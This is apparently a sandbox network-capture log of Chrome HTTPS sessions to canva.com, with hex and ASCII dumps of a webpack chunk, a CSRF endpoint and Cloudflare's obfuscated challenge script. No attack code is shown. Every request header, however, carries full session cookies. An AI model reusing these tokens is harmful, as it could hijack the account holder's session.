                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC411INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 36 32 30 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 36 38 38 31 36 35 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 66
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[7620],{/***/ 688165:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._f


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    47192.168.2.449793104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1306OUTGET /_ajax/csrf3/ae HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC1064INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:31 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a282f27729f-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                    x-request-id: 8f4a7a282f27729f
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5wwh7V1fEpoe1841KC7Hq1itN0mfzR4gFo9Vsw8Ct2t%2FQQP5zc1aDZ0QqmqupUiXYVR7hU4v96uoWJsdiWJMBPKaeYOqt36eokEjSxQu%2FjqitoqI%2BGDeOc3mCGrXZi8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC143INData Raw: 38 39 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 41 22 3a 22 77 51 6d 70 77 73 38 37 77 6e 45 70 68 6c 66 6f 57 6c 48 48 34 5f 66 6a 66 4d 4b 65 6b 4f 65 73 35 54 71 34 50 68 35 57 4c 76 44 76 76 5a 71 7a 32 48 2d 65 6d 4e 44 47 49 62 62 65 61 34 4e 73 57 36 41 57 6e 6d 56 41 4f 49 6f 4b 42 48 38 68 71 43 45 44 74 30 49 65 30 31 49 22 2c 22 42 22 3a 31 37 33 34 36 35 30 38 35 31 39 30 35 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 89'"])}while(1);</x>//{"A":"wQmpws87wnEphlfoWlHH4_fjfMKekOes5Tq4Ph5WLvDvvZqz2H-emNDGIbbea4NsW6AWnmVAOIoKBH8hqCEDt0Ie01I","B":1734650851905}
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    48192.168.2.449796104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1356OUTGET /cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js? HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC720INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:32 GMT
                                                                                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 8795
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2B7vF1dt%2FflMzG9VZ1wILFyLbLe8x%2F30l5Rout1BnpHomUQ0FOFguzqw5Yh0MeN2OlifgOlGjV3x0K6N4nwnd5hbmcvDR97U4QjoiiTZDCjECgQHLTRMjCEJIL5VMpo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a7a29da944321-EWR
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC649INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 57 2c 68 2c 69 2c 6a 2c 6b 2c 6f 2c 73 2c 42 29 7b 57 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 56 2c 66 2c 67 29 7b 66 6f 72 28 56 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 67 3d 70 61 72 73 65 49 6e 74 28 56 28 34 34 35 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 56 28 34 32 39 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 34 32 33 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 56 28 33 39 32 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 34 35 37 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 56 28 34 30 31 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 34 30 34 29 29 2f 37 2a 28 70 61
                                                                                                                                                                                                                                                    Data Ascii: window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,j,k,o,s,B){W=b,function(d,e,V,f,g){for(V=b,f=d();!![];)try{if(g=parseInt(V(445))/1*(-parseInt(V(429))/2)+-parseInt(V(423))/3*(parseInt(V(392))/4)+-parseInt(V(457))/5+parseInt(V(401))/6+-parseInt(V(404))/7*(pa
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC1369INData Raw: 34 38 39 29 5d 26 26 28 49 3d 49 5b 61 31 28 34 31 30 29 5d 28 67 5b 61 31 28 34 39 32 29 5d 5b 61 31 28 34 38 39 29 5d 28 45 29 29 29 2c 49 3d 67 5b 61 31 28 33 39 38 29 5d 5b 61 31 28 34 32 31 29 5d 26 26 67 5b 61 31 28 34 34 39 29 5d 3f 67 5b 61 31 28 33 39 38 29 5d 5b 61 31 28 34 32 31 29 5d 28 6e 65 77 20 67 5b 28 61 31 28 34 34 39 29 29 5d 28 49 29 29 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 61 32 2c 50 29 7b 66 6f 72 28 61 32 3d 61 31 2c 4f 5b 61 32 28 33 38 35 29 5d 28 29 2c 50 3d 30 3b 50 3c 4f 5b 61 32 28 34 31 36 29 5d 3b 4f 5b 50 2b 31 5d 3d 3d 3d 4f 5b 50 5d 3f 4f 5b 61 32 28 35 30 31 29 5d 28 50 2b 31 2c 31 29 3a 50 2b 3d 31 29 3b 72 65 74 75 72 6e 20 4f 7d 28 49 29 2c 4a 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 4a 3d 4a
                                                                                                                                                                                                                                                    Data Ascii: 489)]&&(I=I[a1(410)](g[a1(492)][a1(489)](E))),I=g[a1(398)][a1(421)]&&g[a1(449)]?g[a1(398)][a1(421)](new g[(a1(449))](I)):function(O,a2,P){for(a2=a1,O[a2(385)](),P=0;P<O[a2(416)];O[P+1]===O[P]?O[a2(501)](P+1,1):P+=1);return O}(I),J='nAsAaAb'.split('A'),J=J
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC1369INData Raw: 30 29 3a 51 2b 2b 2c 48 2b 2b 29 3b 66 6f 72 28 55 3d 4b 5b 61 65 28 34 36 38 29 5d 28 30 29 2c 48 3d 30 3b 38 3e 48 3b 50 3d 31 26 55 7c 50 3c 3c 31 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 61 65 28 35 30 35 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 55 3d 31 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 50 3c 3c 31 2e 34 33 7c 55 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 61 65 28 35 30 35 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3d 30 2c 48 2b 2b 29 3b 66 6f 72 28 55 3d 4b 5b 61 65 28 34 36 38 29 5d 28 30 29 2c 48 3d 30 3b 31 36 3e 48 3b 50 3d 31 26 55 7c 50 3c 3c 31 2c 51 3d 3d 46 2d 31 3f 28 51 3d 30 2c 4f 5b 61 65 28 35 30 35 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a
                                                                                                                                                                                                                                                    Data Ascii: 0):Q++,H++);for(U=K[ae(468)](0),H=0;8>H;P=1&U|P<<1,F-1==Q?(Q=0,O[ae(505)](G(P)),P=0):Q++,U>>=1,H++);}else{for(U=1,H=0;H<N;P=P<<1.43|U,F-1==Q?(Q=0,O[ae(505)](G(P)),P=0):Q++,U=0,H++);for(U=K[ae(468)](0),H=0;16>H;P=1&U|P<<1,Q==F-1?(Q=0,O[ae(505)](G(P)),P=0):
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC1369INData Raw: 4a 3d 34 2c 4b 3d 33 2c 4c 3d 5b 5d 2c 4f 3d 47 28 30 29 2c 50 3d 46 2c 51 3d 31 2c 4d 3d 30 3b 33 3e 4d 3b 48 5b 4d 5d 3d 4d 2c 4d 2b 3d 31 29 3b 66 6f 72 28 52 3d 30 2c 53 3d 4d 61 74 68 5b 61 68 28 34 37 36 29 5d 28 32 2c 32 29 2c 4e 3d 31 3b 4e 21 3d 53 3b 54 3d 4f 26 50 2c 50 3e 3e 3d 31 2c 50 3d 3d 30 26 26 28 50 3d 46 2c 4f 3d 47 28 51 2b 2b 29 29 2c 52 7c 3d 28 30 3c 54 3f 31 3a 30 29 2a 4e 2c 4e 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 52 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 52 3d 30 2c 53 3d 4d 61 74 68 5b 61 68 28 34 37 36 29 5d 28 32 2c 38 29 2c 4e 3d 31 3b 4e 21 3d 53 3b 54 3d 4f 26 50 2c 50 3e 3e 3d 31 2c 30 3d 3d 50 26 26 28 50 3d 46 2c 4f 3d 47 28 51 2b 2b 29 29 2c 52 7c 3d 4e 2a 28 30 3c 54 3f 31 3a 30 29 2c 4e 3c 3c 3d 31 29 3b 55 3d 65
                                                                                                                                                                                                                                                    Data Ascii: J=4,K=3,L=[],O=G(0),P=F,Q=1,M=0;3>M;H[M]=M,M+=1);for(R=0,S=Math[ah(476)](2,2),N=1;N!=S;T=O&P,P>>=1,P==0&&(P=F,O=G(Q++)),R|=(0<T?1:0)*N,N<<=1);switch(R){case 0:for(R=0,S=Math[ah(476)](2,8),N=1;N!=S;T=O&P,P>>=1,0==P&&(P=F,O=G(Q++)),R|=N*(0<T?1:0),N<<=1);U=e
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC1369INData Raw: 36 30 30 2c 64 2e 74 29 26 26 28 66 3d 4d 61 74 68 5b 61 36 28 35 30 36 29 5d 28 2b 61 74 6f 62 28 64 2e 74 29 29 2c 67 3d 4d 61 74 68 5b 61 36 28 35 30 36 29 5d 28 44 61 74 65 5b 61 36 28 33 39 34 29 5d 28 29 2f 31 65 33 29 2c 67 2d 66 3e 65 29 29 72 65 74 75 72 6e 21 5b 5d 3b 72 65 74 75 72 6e 21 21 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 43 28 61 69 2c 64 2c 65 2c 66 2c 67 2c 45 29 7b 69 66 28 61 69 3d 57 2c 64 3d 68 5b 61 69 28 34 36 32 29 5d 2c 21 64 29 72 65 74 75 72 6e 3b 69 66 28 21 79 28 29 29 72 65 74 75 72 6e 3b 28 65 3d 21 5b 5d 2c 66 3d 64 5b 61 69 28 34 38 31 29 5d 3d 3d 3d 21 21 5b 5d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 61 6a 2c 46 29 7b 28 61 6a 3d 61 69 2c 21 65 29 26 26 28 65 3d 21 21 5b 5d 2c 46 3d 76 28 29 2c 7a 28 46 2e 72 2c 66 75 6e 63
                                                                                                                                                                                                                                                    Data Ascii: 600,d.t)&&(f=Math[a6(506)](+atob(d.t)),g=Math[a6(506)](Date[a6(394)]()/1e3),g-f>e))return![];return!![]}function C(ai,d,e,f,g,E){if(ai=W,d=h[ai(462)],!d)return;if(!y())return;(e=![],f=d[ai(481)]===!![],g=function(aj,F){(aj=ai,!e)&&(e=!![],F=v(),z(F.r,func
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC1369INData Raw: 69 71 6c 64 2c 70 61 72 65 6e 74 2c 61 70 70 65 6e 64 43 68 69 6c 64 2c 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 2c 63 68 61 72 43 6f 64 65 41 74 2c 69 66 72 61 6d 65 2c 64 65 74 61 69 6c 2c 73 74 61 74 75 73 2c 44 46 4c 6f 67 41 57 34 62 45 48 5a 33 2b 49 58 30 24 78 59 56 72 79 36 63 4a 50 54 4b 39 69 77 4f 68 7a 76 6a 73 4e 38 52 75 47 66 42 6c 31 70 64 2d 6b 6d 51 6e 74 61 53 43 55 35 71 37 65 32 4d 2c 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 57 51 5a 42 6c 58 50 4d 4c 47 74 2c 6c 6f 61 64 69 6e 67 2c 70 6f 77 2c 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2c 50 4f 53 54 2c 5f 63 66 5f 63 68 6c 5f 6f 70 74 2c 73 74 72 69 6e 67 69 66 79 2c 61 70 69 2c 70 72 6f 74 6f 74 79 70 65 2c 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2c 65 72 72 6f 72 49 6e 66 6f 4f
                                                                                                                                                                                                                                                    Data Ascii: iqld,parent,appendChild,display: none,charCodeAt,iframe,detail,status,DFLogAW4bEHZ3+IX0$xYVry6cJPTK9iwOhzvjsN8RuGfBl1pd-kmQntaSCU5q7e2M,hasOwnProperty,WQZBlXPMLGt,loading,pow,XMLHttpRequest,POST,_cf_chl_opt,stringify,api,prototype,contentWindow,errorInfoO
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC1301INData Raw: 33 31 29 2b 31 2b 61 62 28 34 39 35 29 2b 49 2e 72 2b 61 62 28 33 38 37 29 2c 4b 3d 6e 65 77 20 68 5b 28 61 62 28 34 37 37 29 29 5d 28 29 2c 21 4b 29 72 65 74 75 72 6e 3b 4c 3d 61 62 28 34 37 38 29 2c 4d 3d 7b 7d 2c 4d 5b 61 62 28 34 34 31 29 5d 3d 68 5b 61 62 28 34 37 39 29 5d 5b 61 62 28 34 34 31 29 5d 2c 4d 5b 61 62 28 34 33 37 29 5d 3d 68 5b 61 62 28 34 37 39 29 5d 5b 61 62 28 34 33 37 29 5d 2c 4d 5b 61 62 28 34 30 37 29 5d 3d 68 5b 61 62 28 34 37 39 29 5d 5b 61 62 28 34 30 37 29 5d 2c 4d 5b 61 62 28 33 39 30 29 5d 3d 68 5b 61 62 28 34 37 39 29 5d 5b 61 62 28 33 38 34 29 5d 2c 4e 3d 4d 2c 4b 5b 61 62 28 34 31 32 29 5d 28 4c 2c 4a 2c 21 21 5b 5d 29 2c 4b 5b 61 62 28 34 35 39 29 5d 3d 32 35 30 30 2c 4b 5b 61 62 28 34 35 38 29 5d 3d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                    Data Ascii: 31)+1+ab(495)+I.r+ab(387),K=new h[(ab(477))](),!K)return;L=ab(478),M={},M[ab(441)]=h[ab(479)][ab(441)],M[ab(437)]=h[ab(479)][ab(437)],M[ab(407)]=h[ab(479)][ab(407)],M[ab(390)]=h[ab(479)][ab(384)],N=M,K[ab(412)](L,J,!![]),K[ab(459)]=2500,K[ab(458)]=functio


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    49192.168.2.449797104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1569OUTPOST /cdn-cgi/challenge-platform/h/b/jsd/r/8f4a79db8e0a727a HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Content-Length: 15979
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC15979OUTData Raw: 7b 22 77 70 22 3a 22 51 53 6c 68 64 72 73 41 64 49 6c 64 71 67 30 73 65 73 32 33 75 68 72 6b 33 76 4c 33 6a 42 6a 2d 2d 72 41 73 36 4b 33 37 52 6b 4a 52 4e 6c 33 50 37 59 54 30 52 49 73 61 33 71 65 6c 56 44 53 53 33 76 31 2d 33 79 33 2d 6b 2d 6c 73 33 69 2d 73 35 30 58 68 31 49 53 47 77 55 68 37 52 45 53 4c 76 4d 61 32 67 56 78 68 35 45 64 43 4c 38 73 4d 4b 37 31 6a 33 64 6c 6c 6f 6a 50 72 47 44 33 46 56 44 4e 48 47 33 48 68 67 50 33 72 43 6c 33 6a 68 72 72 68 45 71 68 6a 33 73 52 33 75 49 62 33 73 38 47 33 66 39 41 76 56 53 59 73 76 31 44 6c 33 72 39 47 33 72 30 54 75 33 54 72 33 73 47 69 4e 74 6c 55 61 4c 6b 72 56 72 73 48 35 4c 53 4b 64 45 6d 63 48 37 33 42 68 72 6a 7a 57 53 33 41 62 53 52 67 4e 37 2b 69 56 33 54 63 48 31 45 42 76 68 33 74 31 42 4e 6a
                                                                                                                                                                                                                                                    Data Ascii: {"wp":"QSlhdrsAdIldqg0ses23uhrk3vL3jBj--rAs6K37RkJRNl3P7YT0RIsa3qelVDSS3v1-3y3-k-ls3i-s50Xh1ISGwUh7RESLvMa2gVxh5EdCL8sMK71j3dllojPrGD3FVDNHG3HhgP3rCl3jhrrhEqhj3sR3uIb3s8G3f9AvVSYsv1Dl3r9G3r0Tu3Tr3sGiNtlUaLkrVrsH5LSKdEmcH73BhrjzWS3AbSRgN7+iV3TcH1EBvh3t1BNj
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC1353INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:32 GMT
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.canva.com; Priority=High; HttpOnly; Secure; SameSite=None
